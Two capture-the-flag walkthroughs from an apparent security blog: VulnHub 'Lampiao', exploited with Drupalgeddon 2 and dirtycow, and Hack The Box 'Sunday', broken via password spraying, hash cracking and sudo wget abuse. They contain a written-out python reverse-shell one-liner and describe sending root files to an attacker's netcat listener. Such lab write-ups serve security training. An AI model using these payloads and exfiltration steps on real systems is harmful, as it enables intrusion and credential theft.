VulnHub – Lampiao

Please note: This post was first released on October 09, 2018 on my old blog at:

Machine: Lampiao
Difficulty: Easy
Goal: Root Flag

The first step when attacking a new machine is to gather some initial information about the types of hosted services and their versions. This is why we usually start with a simple Nmap scan over the entire port range with the option “-p-“. After we have identified the ports which are being used by the system we use Nmap once more to scan in detail to fingerprint the services and their versions for every open port that we have discovered. To do so we use the options “-sV“, “-sC” and “-p X,Y,Z” where “X,Y,Z” is a list of every open port that we know of.

1. Results of (detailed) Nmap scan

The Nmap scan shows that there is an OpenSSH Service on port 22, some weird ASCII art at port 80 and an Apache web service on port 1898. Furthermore Nmap shows that the web service on port 1898 might use Drupal 7 and hosts a “robots.txt” file. Before we start investigating the website on port 1898 by browsing the site, we start some reconnaissance by using gobuster to search for some unusual or hidden directories that the web service is hosting. While that scan is running we take a closer look at the website itself by browsing the “/robots.txt” directory. Inside the robots.txt file are many entries for allowed and disallowed directories. By browsing the directories of multiple of these entries we can confirm the usage of Drupal 7 by reading the “Changelog.txt“. Furthermore we can identify the exact version of Drupal as shown in figure 2.

2. Changelog.txt on web service

Because we now have knowledge of the exact version of Drupal that us running on the host we can search for any existing exploits. To do so we can use the tool searchsploit to search for exploits inside a local copy of the exploit database by Offensive Security. Figure 3 shows that there are multiple exploits for Drupal 7. But since we need an exploit for version 7.54 and we do not have any way to obtain an authenticated session we can only use Drupalgeddon 2.

3. Searching for Drupal 7 exploit with searchsploit

We use the parameter “-m” with searchsploit to get a copy of Drupalgeddon 2 in our working directory and run the exploit which is a ruby script. Surprisingly it works without any modification and we get a shell as user www-data. As figure 4 shows, at this point we only have a sandboxed shell, which is why we need to import tty. But when using python to spawn a tty shell our reverse shell breaks. I am guessing this is due to a missing encoding or that the web shell is messing with the quotes and that they need to be escaped in some way.

4. Using Drupalgeddon 2

Since we want to get a real reverse shell we edit the Drupalgeddon 2 exploit script and replace the payload, which is a simple php reverse shell, with the following python code:

bashcmd = “python -c ‘import socket, subprocess, os; s = socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect((\”\”,1234)); os.dup2(s.fileno(), 0); os.dup2(s.fileno(), 1); os.dup2(s.fileno(), 2); p =[\”/bin/sh\”,\”-i\”]);’ “

This python script will open up a simple reverse shell to our attacking machine on port 1234. It is important to notice that all double quotes, besides the ones that belong to the bashcmd call, need to be escaped by using a single backslash.

5. Editing Drupalgeddon 2 to spawn a python reverse shell on port 1234

As figure 5 shows, running the edited exploit opens up a session on port 1234 and allows us to spawn a fully interactive tty. The next step is to find a way to escalate our privileges and get root access on the system. While enumerating the system we use the command “uname -a” to get more information about the systems kernel. Figure 6 shows, that the kernel version is 14.04.1 which dates back to the year 2016.

6. Getting kernel information

With a kernel that is at least two years old it is always a good idea to see if there are any valid kernel exploits that can be used to escalate privileges. To do so we use a shell script called linux-exploit-suggester which we can find by searching for “linux kernel exploit check” on Google. We download the bash script to our local attacking machine and use a simple http server to host the file. Afterwards we use wget from the target machine to download the file and execute it.

7. Extract of results for linux exploit suggester

As shown in figure 7, the script shows that since the machine is using Ubuntu version 14.04.1 the kernel should be vulnerable to the famous dirtycow exploit. We will use the following dirtycow Proof-of-Concept code since it is well documented and it has worked for me on previous machines. Furthermore it requires the tool make to compile the code, which is already installed and ready to use  on the victim machine.

We use git to clone the dirtycow repository to our local attacking machine and use a simple http server to host all downloaded files. Afterwards we use wget to transfer the “dcow.cpp” and the “makefile” to the target machine (lampiao). Then we use make to compile the exploit code and execute it.

8. Compiling and executing dirtycow & getting root flag

As figure 8 shows the exploit worked like a charm and grants us root privileges by editing the passwd file. With the root privileges we are able to obtain our goal – accessing the root flag.


Hack The Box – Sunday

Please note: This post was first released on September 29, 2018 on my old blog at:

This box retired on 29th of September 2018
Goal: CTF – user.txt & root.txt
Difficulty: 4.1 / 10 (rated by HTB-community)

We start with a Nmap scan and use the parameter “-p-” to scan the entire (tcp) port range. As figure 1 shows the box offers a ssh service on port 22022. We could use this information to start a password spraying attack, but to do so we need to know any valid usernames first. Another service that is running on the box is finger, which is a user information lookup program. As shown in figure 1 Nmap already obtained two valid usernames for the box by using finger.

1. Nmap scan result

For each of the two usernames “sunny” and “sammy” we start a password spraying attack with THC-Hydra. With the right password list we gain a hit after some minutes for the user sunny as shown in figure 2.

2. Hydra password spraying

After connecting to the box via ssh as the user sunny we search for the user flag. Typically these flags are inside the “/home” directory of a user. But we wont find any flag inside the home directory for the user sunny. Since we already know about a second user we look inside the “/home” directory for the user sammy. Inside this directory we find the “user.txt” flag, but unfortunately we are not able to access the file. To do so we need to escalate our privileges or access the machine as user sammy.

While doing the standard system enumeration and search for a valid privilege escalation technique we find an entry for the sudo command as shown in figure 3.

3. Sudo options for user sunny

Since it says “troll” we will ignore it for now, while keeping this in mind because it might come in handy later. After some more enumeration we find a backup directory. Inside that directory is a file called “shadow.backup” which contains some password hashes as shown in figure 4.

4. Backup of shadow

We copy the password hash for the user sammy and use hashcat to perform a dictionary attack to gain the cleartext password as shown in figure 5.

5. Using hashcat to recover the password for user sammy
6. Accessing the user flag

With the new obtained password we switch to the user sammy on the box, which grants us access to the user flag. The next step is to gain root privileges. To do so we once more start with the enumeration of the system. While checking for privileges on using sudo we notice that for user sammy there is no “troll”  entry anymore but instead a “NOPASSWD” for “wget” as shown in figure 7.

7. Sudo options for user sammy

With this in mind we take a look at the manual for wget and find an entry for the “–post-file=file option. With this option we can use POST as the method for all HTTP requests and send the data inside the request body. We can use this option to send the contents of the root flag to our local attacking machine while using netcat to listen for the incoming data as shown in figure 8.

8. Obtaining the root flag

At this point we could have also gained a root shell by using wget to send any ssh keys or to manipulate the passwd file on the box. Another interesting file to copy from the box is the shadow file which contains the hash for the password of user root. But sadly, after copying the hash I was not able to recover the password with hashcat and ended up with multiple failed dictionary attacks.

9. Getting root hash